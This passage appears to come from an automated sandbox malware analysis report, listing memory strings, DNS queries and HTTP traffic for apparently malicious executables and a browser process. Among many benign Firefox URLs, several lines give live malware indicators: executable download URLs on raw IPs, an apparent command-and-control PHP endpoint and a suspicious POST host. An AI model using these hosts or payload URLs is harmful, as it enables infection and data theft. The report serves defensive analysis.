Source: firefox.exe, 00000019.00000002.2463002114.000002728F172000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000002.2463002114.000002728F172000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/https://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=AIzaSyC7jsptDS3am4tPx4r3nxis7IMjBc5Dovo&$httpMethod=POST equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.2463002114.000002728F172000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/https://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=AIzaSyC7jsptDS3am4tPx4r3nxis7IMjBc5Dovo&$httpMethod=POST equals www.twitter.com (Twitter)
Source: firefox.exe, 00000019.00000002.2463002114.000002728F172000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/https://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=AIzaSyC7jsptDS3am4tPx4r3nxis7IMjBc5Dovo&$httpMethod=POST equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000002.2463002114.000002728F172000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.2463002114.000002728F172000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000002.2463002114.000002728F172000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.2463002114.000002728F172000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000002.2463002114.000002728F172000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.2463002114.000002728F172000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000019.00000002.2463002114.000002728F172000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000002.2463002114.000002728F172000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.2463002114.000002728F172000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000019.00000002.2463002114.000002728F172000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000002.2463002114.000002728F172000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2482727507.0000027292981000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.2463002114.000002728F172000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2482727507.0000027292981000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000019.00000002.2463002114.000002728F172000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2482727507.0000027292981000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000002.2463002114.000002728F172000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/(currentDate|date - profileAgeCreated) / 86400000 >= 28 && 'browser.newtabpage.activity-stream.feeds.section.topstories' | preferenceValue == true equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.2463002114.000002728F172000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/(currentDate|date - profileAgeCreated) / 86400000 >= 28 && 'browser.newtabpage.activity-stream.feeds.section.topstories' | preferenceValue == true equals www.twitter.com (Twitter)
Source: firefox.exe, 00000019.00000002.2463002114.000002728F172000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/(currentDate|date - profileAgeCreated) / 86400000 >= 28 && 'browser.newtabpage.activity-stream.feeds.section.topstories' | preferenceValue == true equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000002.2528820121.000002729497A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2481912376.0000027292816000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.facebook.com equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.2481912376.0000027292816000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.youtube.com equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000002.2528820121.0000027294996000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2561348786.000002729AF60000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2528820121.0000027294970000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: x*://www.facebook.com/platform/impression.php* equals www.facebook.com (Facebook)
Source: global traffic DNS traffic detected: DNS query: property-imper.sbs
Source: global traffic DNS traffic detected: DNS query: prod.classify-client.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: youtube.com
Source: global traffic DNS traffic detected: DNS query: detectportal.firefox.com
Source: global traffic DNS traffic detected: DNS query: prod.detectportal.prod.cloudops.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: contile.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: prod.balrog.prod.cloudops.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: spocs.getpocket.com
Source: global traffic DNS traffic detected: DNS query: prod.ads.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: content-signature-2.cdn.mozilla.net
Source: global traffic DNS traffic detected: DNS query: prod.content-signature-chains.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: example.org
Source: global traffic DNS traffic detected: DNS query: ipv4only.arpa
Source: global traffic DNS traffic detected: DNS query: shavar.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: www.google.com
Source: unknown HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: property-imper.sbs
Source: firefox.exe, 00000019.00000002.2482727507.000002729294C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2561348786.000002729AF47000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://127.0.0.1:
Source: f20b4c0961.exe, f20b4c0961.exe, 0000000B.00000002.2763484000.000000000068E000.00000004.00000020.00020000.00000000.sdmp, f20b4c0961.exe, 0000000B.00000002.2763484000.00000000006AA000.00000004.00000020.00020000.00000000.sdmp, f20b4c0961.exe, 0000000B.00000003.2687794074.00000000006BB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exe
Source: f20b4c0961.exe, 0000000B.00000002.2762752714.00000000004FA000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exepleWebKit/537.36
Source: f20b4c0961.exe, 0000000B.00000002.2763484000.00000000006AA000.00000004.00000020.00020000.00000000.sdmp, f20b4c0961.exe, 0000000B.00000003.2687794074.00000000006BB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exes
Source: f20b4c0961.exe, f20b4c0961.exe, 0000000B.00000002.2763484000.00000000006AA000.00000004.00000020.00020000.00000000.sdmp, f20b4c0961.exe, 0000000B.00000003.2687794074.00000000006BB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/steam/random.exe
Source: f20b4c0961.exe, 0000000B.00000002.2763484000.00000000006AA000.00000004.00000020.00020000.00000000.sdmp, f20b4c0961.exe, 0000000B.00000003.2687794074.00000000006BB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/steam/random.exeP
Source: e2af9f55fd.exe, 0000000A.00000002.2254292302.000000000128E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206
Source: e2af9f55fd.exe, 0000000A.00000002.2254292302.00000000012EF000.00000004.00000020.00020000.00000000.sdmp, e2af9f55fd.exe, 0000000A.00000002.2254292302.000000000128E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/
Source: e2af9f55fd.exe, 0000000A.00000002.2254292302.00000000012EF000.00000004.00000020.00020000.00000000.sdmp, e2af9f55fd.exe, 0000000A.00000002.2254292302.000000000128E000.00000004.00000020.00020000.00000000.sdmp, e2af9f55fd.exe, 0000000A.00000002.2254292302.0000000001302000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
Source: e2af9f55fd.exe, 0000000A.00000002.2254292302.00000000012EF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/l
Source: e2af9f55fd.exe, 0000000A.00000002.2254292302.0000000001302000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php:Py)
Source: e2af9f55fd.exe, 0000000A.00000002.2254292302.00000000012EF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpF
Source: e2af9f55fd.exe, 0000000A.00000002.2254292302.000000000128E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpX
Source: e2af9f55fd.exe, 0000000A.00000002.2254292302.000000000128E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpf-9bc86c8e8c94z
Source: e2af9f55fd.exe, 0000000A.00000002.2254292302.00000000012EF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/k
Source: e2af9f55fd.exe, 0000000A.00000002.2254292302.00000000012EF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/ws
Source: firefox.exe, 00000019.00000002.2516262256.0000027294862000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2492921640.0000027293227000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2390907395.000002729486A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://a9.com/-/spec/opensearch/1.0/
Source: firefox.exe, 00000019.00000002.2516262256.0000027294862000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2492921640.0000027293227000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2390907395.000002729486A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://a9.com/-/spec/opensearch/1.1/
Source: firefox.exe, 00000019.00000002.2516262256.0000027294862000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2492921640.0000027293227000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2390907395.000002729486A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://a9.com/-/spec/opensearchdescription/1.0/
Source: firefox.exe, 00000019.00000002.2516262256.0000027294862000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2492921640.0000027293227000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2390907395.000002729486A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://a9.com/-/spec/opensearchdescription/1.1/
Source: f20b4c0961.exe, 00000009.00000003.2217175427.00000000059E6000.00000004.00000800.00020000.00000000.sdmp, f20b4c0961.exe, 0000000B.00000003.2401085437.0000000005422000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: f20b4c0961.exe, 00000009.00000003.2217175427.00000000059E6000.00000004.00000800.00020000.00000000.sdmp, f20b4c0961.exe, 0000000B.00000003.2401085437.0000000005422000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: firefox.exe, 00000019.00000002.2463002114.000002728F172000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%shttp://www.inbox.lv/rfc2368/?value=%s
Source: f20b4c0961.exe, 00000009.00000003.2349009212.000000000116C000.00000004.00000020.00020000.00000000.sdmp, f20b4c0961.exe, 00000009.00000003.2294043967.0000000001161000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.micro
Source: f20b4c0961.exe, 00000009.00000003.2217175427.00000000059E6000.00000004.00000800.00020000.00000000.sdmp, f20b4c0961.exe, 0000000B.00000003.2401085437.0000000005422000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: f20b4c0961.exe, 00000009.00000003.2217175427.00000000059E6000.00000004.00000800.00020000.00000000.sdmp, f20b4c0961.exe, 0000000B.00000003.2401085437.0000000005422000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: f20b4c0961.exe, 00000009.00000003.2217175427.00000000059E6000.00000004.00000800.00020000.00000000.sdmp, f20b4c0961.exe, 0000000B.00000003.2401085437.0000000005422000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: f20b4c0961.exe, 00000009.00000003.2217175427.00000000059E6000.00000004.00000800.00020000.00000000.sdmp, f20b4c0961.exe, 0000000B.00000003.2401085437.0000000005422000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: f20b4c0961.exe, 00000009.00000003.2217175427.00000000059E6000.00000004.00000800.00020000.00000000.sdmp, f20b4c0961.exe, 0000000B.00000003.2401085437.0000000005422000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: firefox.exe, 00000019.00000002.2569395137.000002729B6E0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2542958150.0000027295FA2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com
Source: firefox.exe, 00000019.00000002.2489207640.0000027293017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2536942361.00000272950BA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/canonical.html
Source: firefox.exe, 00000019.00000002.2489207640.000002729304B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv4
Source: firefox.exe, 00000019.00000002.2458618765.000002728E78A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/common
Source: firefox.exe, 00000019.00000002.2458618765.000002728E78A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/math
Source: firefox.exe, 00000019.00000002.2458618765.000002728E78A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/sets
Source: firefox.exe, 00000019.00000002.2516262256.0000027294862000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://json-schema.org/draft-04/schema#
Source: firefox.exe, 00000019.00000002.2516262256.0000027294862000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://json-schema.org/draft-06/schema#
Source: firefox.exe, 00000019.00000002.2516262256.0000027294862000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://json-schema.org/draft-07/schema#
Source: firefox.exe, 00000019.00000002.2516262256.0000027294862000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2576582676.000002729D1A7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org
Source: firefox.exe, 00000019.00000002.2582142456.00001C4C4A104000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/
Source: firefox.exe, 00000019.00000002.2516262256.0000027294862000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/additionalProperties
Source: firefox.exe, 00000019.00000002.2516262256.0000027294862000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/addonsFeatureGate
Source: firefox.exe, 00000019.00000002.2516262256.0000027294862000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/addonsShowLessFrequentlyCap
Source: firefox.exe, 00000019.00000002.2516262256.0000027294862000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/addonsUITreatment
Source: firefox.exe, 00000019.00000002.2516262256.0000027294862000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/autoFillAdaptiveHistoryEnabled
Source: firefox.exe, 00000019.00000002.2516262256.0000027294862000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/autoFillAdaptiveHistoryMinCharsThreshold
Source: firefox.exe, 00000019.00000002.2516262256.0000027294862000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/autoFillAdaptiveHistoryMinCharsThresholdExpected
Source: firefox.exe, 00000019.00000002.2516262256.0000027294862000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/autoFillAdaptiveHistoryUseCountThreshold
Source: firefox.exe, 00000019.00000002.2516262256.0000027294862000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/autoFillAdaptiveHistoryUseCountThresholdhttp://mozilla.org/#/propert
Source: firefox.exe, 00000019.00000002.2516262256.0000027294862000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/bestMatchBlockingEnabled
Source: firefox.exe, 00000019.00000002.2516262256.0000027294862000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/bestMatchEnabledhttp://mozilla.org/#/properties/mdnFeatureGate
Source: firefox.exe, 00000019.00000002.2516262256.0000027294862000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0/items/properties/feature
Source: firefox.exe, 00000019.00000002.2516262256.0000027294862000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0/items/properties/ratio
Source: firefox.exe, 00000019.00000002.2516262256.0000027294862000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0/items/properties/slug
Source: firefox.exe, 00000019.00000002.2516262256.0000027294862000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/feature
Source: firefox.exe, 00000019.00000002.2516262256.0000027294862000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/features
Source: firefox.exe, 00000019.00000002.2516262256.0000027294862000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/features/items/properties/value/ad
Source: firefox.exe, 00000019.00000002.2516262256.0000027294862000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/features/itemsTabsToolbar
Source: firefox.exe, 00000019.00000002.2516262256.0000027294862000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/ratio
Source: firefox.exe, 00000019.00000002.2516262256.0000027294862000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/slug
Source: firefox.exe, 00000019.00000002.2516262256.0000027294862000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items/properties/features
Source: firefox.exe, 00000019.00000002.2516262256.0000027294862000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items/properties/features/items/properties/value/ad
Source: firefox.exe, 00000019.00000002.2516262256.0000027294862000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items/properties/features/itemsmoz-extension://d459
Source: firefox.exe, 00000019.00000002.2516262256.0000027294862000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items/properties/ratio
Source: firefox.exe, 00000019.00000002.2516262256.0000027294862000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items/properties/slug
Source: firefox.exe, 00000019.00000002.2516262256.0000027294862000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/bucketConfig/properties/namespace
Source: firefox.exe, 00000019.00000002.2516262256.0000027294862000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/bucketConfig/properties/randomizationUnit
Source: firefox.exe, 00000019.00000002.2516262256.0000027294862000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/ehPreloadEnabledRollout
Source: firefox.exe, 00000019.00000002.2516262256.0000027294862000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/experimentType
Source: firefox.exe, 00000019.00000002.2516262256.0000027294862000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/exposureResults
Source: firefox.exe, 00000019.00000002.2516262256.0000027294862000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/isBestMatchExperiment
Source: firefox.exe, 00000019.00000002.2516262256.0000027294862000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/localizations/anyOf/0/additionalProperties
Source: firefox.exe, 00000019.00000002.2516262256.0000027294862000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/merinoEnabled
Source: firefox.exe, 00000019.00000002.2516262256.0000027294862000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/merinoProviders
Source: firefox.exe, 00000019.00000002.2516262256.0000027294862000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/merinoTimeoutMs
Source: firefox.exe, 00000019.00000002.2516262256.0000027294862000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/networkPredictorDELETE
Source: firefox.exe, 00000019.00000002.2516262256.0000027294862000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/outcomes/items/properties/priority
Source: firefox.exe, 00000019.00000002.2516262256.0000027294862000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/preconnect
Source: firefox.exe, 00000019.00000002.2516262256.0000027294862000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestAllowPositionInSuggestions
Source: firefox.exe, 00000019.00000002.2516262256.0000027294862000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestDataCollectionEnabled
Source: firefox.exe, 00000019.00000002.2516262256.0000027294862000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestDataCollectionEnabledUnable
Source: firefox.exe, 00000019.00000002.2516262256.0000027294862000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestImpressionCapsNonSponsoredEnabled
Source: firefox.exe, 00000019.00000002.2516262256.0000027294862000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestImpressionCapsSponsoredEnabled
Source: firefox.exe, 00000019.00000002.2516262256.0000027294862000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestImpressionCapsSponsoredEnabledcd09ae95-e2cf-4b8b-8929-79
Source: firefox.exe, 00000019.00000002.2516262256.0000027294862000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestOnboardingDialogVariation
Source: firefox.exe, 00000019.00000002.2516262256.0000027294862000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestOnboardingDialogVariationhttp://mozilla.org/#/properties
Source: firefox.exe, 00000019.00000002.2516262256.0000027294862000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestRemoteSettingsDataType
Source: firefox.exe, 00000019.00000002.2516262256.0000027294862000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestRemoteSettingsDataTypehttp://mozilla.org/#/properties/qu
Source: firefox.exe, 00000019.00000002.2516262256.0000027294862000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestRemoteSettingsEnabled
Source: firefox.exe, 00000019.00000002.2516262256.0000027294862000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestShowOnboardingDialogAfterNRestarts
Source: firefox.exe, 00000019.00000002.2516262256.0000027294862000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/recordNavigationalSuggestionTelemetry
Source: firefox.exe, 00000019.00000002.2516262256.0000027294862000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/weatherKeywords
Source: firefox.exe, 00000019.00000002.2481912376.0000027292816000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2502645913.0000027293F67000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2563092645.000002729B1D3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2400926046.000002729B17A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2478820802.00000272913B9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/MPL/2.0/.
Source: f20b4c0961.exe, 00000009.00000003.2217175427.00000000059E6000.00000004.00000800.00020000.00000000.sdmp, f20b4c0961.exe, 0000000B.00000003.2401085437.0000000005422000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
